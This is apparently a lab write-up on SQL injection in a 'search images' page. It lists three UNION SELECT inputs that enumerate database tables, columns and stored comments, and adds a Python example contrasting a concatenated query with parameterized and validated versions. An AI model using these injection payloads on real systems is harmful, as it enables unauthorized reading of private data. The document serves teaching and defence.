SQL injection (search images page)

To exploit, go to http://$IPADDR/?page=searchimg and enter the following inputs in the search field:

List all the tables and related databases:

1 union select table_name, table_schema from information_schema.tables

List all table columns and related table names:

1 union select column_name, table_name from information_schema.columns

List all comments from list_images table:

1 union select id, comment from Member_images.list_images
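
Why the inputs above return extra rows, and the fix, as an added example that is not part of the original README: the same lookup written with string concatenation, with a bound parameter, and with input validation plus binding. SQLite stands in for the target's database, and the table layout (apart from `id` and `comment`), the function names and the sample rows are constructed assumptions.

```python
import re
import sqlite3

# Third input from the write-up above, used here only as test data.
PAYLOAD = "1 union select id, comment from Member_images.list_images"

def make_db():
    """Constructed stand-in: SQLite with an attached schema named Member_images."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS Member_images")
    conn.execute(
        "CREATE TABLE Member_images.list_images "
        "(id INTEGER PRIMARY KEY, title TEXT, comment TEXT)"
    )
    conn.executemany(
        "INSERT INTO Member_images.list_images VALUES (?, ?, ?)",
        [(1, "sunset", "constructed note A"), (2, "harbor", "constructed note B")],
    )
    return conn

def search_vulnerable(conn, term):
    # The search term is concatenated into the SQL text, so "union select ..."
    # is parsed as a second query whose rows are appended to the result.
    sql = "SELECT id, title FROM Member_images.list_images WHERE id = " + term
    return conn.execute(sql).fetchall()

def search_parameterized(conn, term):
    # The term is bound as a value; the statement text never changes.
    sql = "SELECT id, title FROM Member_images.list_images WHERE id = ?"
    return conn.execute(sql, (term,)).fetchall()

def search_hardened(conn, term):
    # Reject anything that is not a short decimal id, then bind it.
    if not re.fullmatch(r"[0-9]{1,9}", term):
        raise ValueError("image id must be a decimal number")
    return search_parameterized(conn, int(term))

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", search_vulnerable(db, PAYLOAD))
    print("parameterized:", search_parameterized(db, PAYLOAD))
    print("hardened '1': ", search_hardened(db, "1"))
```

The concatenated query exposes the `comment` column that the search page never selects; the bound version treats the whole input as one non-matching value.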

References